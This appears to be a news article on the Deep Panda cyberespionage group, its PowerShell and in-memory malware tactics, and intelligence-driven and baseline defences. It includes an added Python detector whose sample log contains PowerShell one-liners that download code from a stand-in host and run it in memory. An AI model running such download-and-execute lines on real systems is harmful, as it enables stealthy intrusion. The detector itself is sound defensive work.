Defensive tactics against sophisticated cyberspies

Aligning security systems with intelligence gathered on groups of elite hackers working for nation states is a key defense for targeted organizations, experts say.

The importance of such a strategy was highlighted this week in a report that found a particular band of Chinese hackers capable of switching targets quickly as geopolitical events changed.

The cyberespionage group, dubbed Deep Panda, shifted focus from U.S. policy experts on Southeast Asia to those following insurgents in Iraq once the rebels began threatening China's investment in the country's oil industry, security vendor CrowdStrike reported.

Defending against such flexible attackers requires a steady stream of intelligence on such groups, so rules can be updated in firewalls and intrusion detection systems (IDS) and indicators refreshed in security information and event management (SIEM) products.

These constant intelligence-based adjustments are an effective way to at least stay even with the attackers.

"You can't take your IDS out of the box, plug it in and expect that to make a difference," Adam Meyers, vice president of threat intelligence for CrowdStrike, said.

Instead, the systems have to be continuously updated based on the changing tactics, techniques and procedures of the hackers, Meyers said.

"Understanding the threat actor, understanding what their motivation is and understanding how they operate is really what CIOs should be taking away from this report," he said.

In the case of Deep Panda, CrowdStrike found that the group breached its victims' networks using Windows PowerShell scripts. PowerShell is a task automation and configuration framework from Microsoft.

The attackers also downloaded and executed from memory a .Net executable called "Wafer," which would download and run a remote access tool (RAT) called MadHatter, one of Deep Panda's favorites, CrowdStrike said.

Running everything in memory keeps malicious files off the hard drive, making them more difficult to detect.

"This is typical for Deep Panda," CrowdStrike said in its blog. "Stealth is their specialty and they prefer to operate in a way that leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time."
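The in-memory download-and-execute behaviour described above is exactly the kind of tradecraft that the earlier point about refreshing IDS and SIEM rules from threat intelligence is meant to catch. The following is an added illustration, not code from CrowdStrike or the article: a small scorer that runs over constructed PowerShell process-creation events (the tab-separated log format, indicator names, weights and every sample line are assumptions) and only raises an alert when a download primitive is combined with in-memory execution or a hidden/encoded launch, so a lone -NoProfile on a scheduled script does not fire.

```python
"""Heuristic triage of PowerShell process-creation events for in-memory
download-and-execute patterns.  Constructed example: the log layout
(time, host, image, command line; tab-separated) and all sample lines are
assumptions, not data from the CSO article or CrowdStrike."""
import re

# Indicator name -> (weight, pattern).  Names and weights are hypothetical
# choices for this example; tune them against your own environment's baseline.
INDICATORS = {
    "download": (1, re.compile(r"Net\.WebClient|Download(String|Data|File)|Invoke-WebRequest", re.I)),
    "exec":     (1, re.compile(r"Invoke-Expression|\bIEX\b|\[Reflection\.Assembly\]::Load", re.I)),
    "hidden":   (1, re.compile(r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-ep\s+bypass", re.I)),
    "encoded":  (2, re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
}

def score_command(cmdline: str) -> tuple[int, list[str]]:
    """Return (total weight, names of matched indicators) for one command line."""
    hits = [name for name, (_w, rx) in INDICATORS.items() if rx.search(cmdline)]
    return sum(INDICATORS[n][0] for n in hits), hits

def triage(log_text: str, threshold: int = 2) -> list[tuple[str, str, int, list[str]]]:
    """Return (time, host, score, hits) for each event at or above threshold.
    One indicator alone (e.g. -NoProfile on a backup job) never reaches it."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, _image, cmd = line.split("\t", 3)
        score, hits = score_command(cmd)
        if score >= threshold:
            alerts.append((ts, host, score, hits))
    return alerts

# Constructed sample events: two download-and-run-in-memory command lines,
# one legitimate scheduled script, one interactive one-liner.
SAMPLE_LOG = (
    "2014-07-08T03:12:44Z\tWKS-017\tpowershell.exe\t"
    "powershell -NoProfile -WindowStyle Hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage1')\"\n"
    "2014-07-08T03:13:01Z\tWKS-017\tpowershell.exe\t"
    "powershell -c \"[Reflection.Assembly]::Load((New-Object Net.WebClient)"
    ".DownloadData('http://example.invalid/payload.bin'))\"\n"
    "2014-07-08T09:00:00Z\tSRV-DC1\tpowershell.exe\t"
    "powershell -NoProfile -File C:\\Scripts\\backup.ps1\n"
    "2014-07-08T09:05:12Z\tWKS-042\tpowershell.exe\tpowershell Get-ChildItem C:\\Users\n"
)

if __name__ == "__main__":
    for ts, host, score, hits in triage(SAMPLE_LOG):
        print(f"{ts} {host} score={score} indicators={','.join(hits)}")
```

Command-line matching of this kind is a first filter only; PowerShell script block logging gives the decoded script content that a reflective loader hides from the process command line.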

This is the kind of information that can be used in readjusting security technology. At the same time, organizations should use a set of technologies considered the defensive baseline, Paul Henry, senior instructor at the SANS Institute, said.

The technologies include:

--Ingress filtering that allows into the network only data packets from those regions of the world where a company does business.

--Technology that produces hash values for access to critical data.

--Anti-virus software to block known threats and whitelisting technology to block unknown programs and scripts from executing.

--Egress filtering that prevents sensitive data from leaving an organization's network.
